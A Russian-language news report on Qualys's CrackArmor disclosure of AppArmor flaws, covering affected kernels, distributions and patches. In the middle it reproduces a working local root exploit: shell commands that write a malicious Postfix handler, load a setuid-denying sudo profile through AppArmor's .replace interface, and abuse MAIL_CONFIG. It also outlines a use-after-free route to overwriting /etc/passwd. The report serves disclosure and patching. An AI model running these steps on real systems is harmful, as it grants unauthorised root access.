Компания Qualys выявила 9 уязвимостей в системе мандатного управления доступом AppArmor, наиболее опасные из которых позволяют локальному непривилегированному пользователю получить права root в системе, выйти из изолированных контейнеров и обойти ограничения, заданные через AppArmor. Уязвимости получили кодовое имя CrackArmor. CVE-идентификаторы пока не назначены. Успешные примеры повышения привилегий продемонстрированы в Ubuntu 24.04 и Debian 13. Проблемы присутствуют в LSM-модуле AppArmor начиная с ядра Linux 4.11, выпущенного в 2017 году, и проявляются в дистрибутивах, использующих AppArmor, таких как Ubuntu, Debian, openSUSE и SUSE (начиная с openSUSE/SUSE 16 по умолчанию задействован SELinux, но AppArmor оставлен в качестве опции). Патчи с устранением уязвимостей переданы разработчикам ядра Linux и в ближайшие дни будут предложены пользователям в составе обновлений 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 и 5.10.253. Исправление также включено в сегодняшние обновления пакетов с ядром для Ubuntu. Попутно в Ubuntu выпущены обновления пакетов sudo, sudo-ldap и util-linux (в состав входит утилита su), в которых устранены недоработки, позволявшие эксплуатировать уязвимость в AppArmor. В Debian обновление в процессе подготовки. Проблемы вызваны наличием в AppArmor фундаментальной уязвимости класса "обманутый посредник" ("confused-deputy"), позволяющей непривилегированным пользователям загружать, заменять и удалять произвольные профили AppArmor. Данная уязвимость напрямую может использоваться для отключения защиты программ и сервисов от локальных и удалённых атак (через запись псевдофайлов /sys/kernel/security/apparmor/.load, .replace и .remove, например, для снятия ограничений в cupsd и rsyslogd), вызова отказа в обслуживании (через применение запрещающих профилей) и обхода ограничений пространств имён (через загрузку нового AppArmor-профиля "userns", например, для /usr/bin/time, позволяющего создавать неограниченные user namespace). Возможность замены профилей AppArmor также позволяет добиться получения root-привилегий через привязку к привилегированным утилитам, таким как su и sudo, новых профилей, блокирующих доступ к некоторым системным вызовам. В частности, права root можно получить блокировав операцию setuid (CAP_SETUID) для утилиты sudo в сочетании с манипуляцией переменной окружения MAIL_CONFIG для смены каталога с настройками для почтового сервера Postfix. Суть метода в том, что при возникновении проблем утилита sudo отправляет администратору письмо, запуская /usr/sbin/sendmail. Блокировав сброс привилегий можно добиться запуска данного процесса с правами root, а выставив перед запуском sudo переменную окружения MAIL_CONFIG можно передать утилите sendmail другие настройки, в том числе указать свой обработчик postdrop, запускаемый при отправке почты. $ mkdir /tmp/postfix $ cat > /tmp/postfix/main.cf << "EOF" command_directory = /tmp/postfix EOF $ cat > /tmp/postfix/postdrop << "EOF" #!/bin/sh /usr/bin/id >> /tmp/postfix/pwned EOF $ chmod -R 0755 /tmp/postfix $ apparmor_parser -K -o sudo.pf << "EOF" /usr/bin/sudo { allow file, allow signal, allow network, allow capability, deny capability setuid, } EOF $ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace Password: $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted sudo: unable to open /etc/sudoers: Operation not permitted sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted sudo: error initializing audit plugin sudoers_audit $ cat /tmp/postfix/pwned uid=0(root) gid=1001(jane) groups=1001(jane),100(users) В качестве других способов повышения привилегий упоминаются уязвимости в коде AppArmor, работающем на уровне ядра Linux. Показано как получить права root при помощи уязвимостей, вызванных двойным выполнением функции free() и обращением к уже освобождённой области памяти (use‑after‑free) в коде загрузки и замены профилей AppArmor. Например, AppArmor сохраняет профиль в структуре aa_loaddata, память для которой выделяется в slab-кэше kmalloc-192, при этом из-за состояния гонки не исключено обращение к памяти, которую занимала структура, после её освобождения. Данную проблему можно использовать для получения контроля над освобожденной памятью и перераспределения освобождённой страницы памяти для маппинга содержимого файла /etc/passwd и перезаписи строки с паролем root.



